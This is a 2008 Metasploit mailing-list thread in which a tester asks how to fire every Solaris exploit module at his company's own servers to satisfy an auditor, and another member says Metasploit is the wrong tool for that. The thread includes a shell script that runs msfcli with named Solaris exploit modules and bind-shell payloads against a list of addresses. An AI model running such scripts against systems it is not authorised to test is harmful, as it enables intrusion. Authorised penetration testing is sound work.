Metasploit mailing list archives
try to exploit everything
From: mail2arthur at gmail.com (arthur)
Date: Fri, 25 Jul 2008 14:15:38 -0400
Thanks. Actually MSF is the 3rd section in my report. The first section is using nmap to discover the IPs/ports, the 2nd section is a Nessus blind scan with all plugins enabled (also unchecked the safeCheck and turned on the thoroughTests), but the auditor still likes to see more with MSF :(

Just trying to find an easy way to make the guy happy instead of talking too much. You know what, even though our server is not running a web app, he still asks for a test of XSS...

Arthur

Arthur,

For this kind of testing, Metasploit is the wrong tool for the job. If you just want to huck a bunch of exploits at the target without regard for whether they might actually work, try something like Nessus instead.

Hope this helped,
egypt

2008/7/25 arthur <mail2arthur at gmail.com>:

Hi All,

We are pentesting our Solaris 10 servers and so far I built a script to call msfcli to try all the Solaris modules (even Solaris 8/9, partial script below). However the auditor likes to see we try ALL to make sure the server/app won't go down after a silly hacker tries a wrong attack. With RHOST set globally, is there any easy way to run all?

Thanks,
Arthur

...
APP=./msfcli
ADD="..."
PL1=cmd/unix/bind_perl
PL2=generic/shell_bind_tcp

# Echo the command, append it to the log file $FN, then run it under sudo
# with stdout and stderr appended to the same log.
test_run() {
    cmd=$@
    echo $cmd
    echo $cmd>>$FN
    sudo $cmd>>$FN 2>&1
}

# Run each module against every address in $ADD.
for addr in $ADD ; do
    test_run $APP solaris/dtspcd/heap_noir RHOST=$addr C
    test_run $APP solaris/lpd/sendmail_exec RHOST=$addr PAYLOAD=$PL1 E
    test_run $APP solaris/samba/lsa_transnames_heap RHOST=$addr PAYLOAD=$PL2 E
    test_run $APP solaris/samba/trans2open RHOST=$addr PAYLOAD=$PL2 TARGET=0 E
    test_run $APP solaris/sunrpc/sadmind_exec RHOST=$addr PAYLOAD=$PL1 E
    test_run $APP solaris/sunrpc/ypupdated_exec RHOST=$addr PAYLOAD=$PL1 E
    test_run $APP solaris/telnet/fuser RHOST=$addr PAYLOAD=$PL1 E
    test_run $APP solaris/telnet/ttyprompt RHOST=$addr PAYLOAD=$PL1 E
done
...

_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework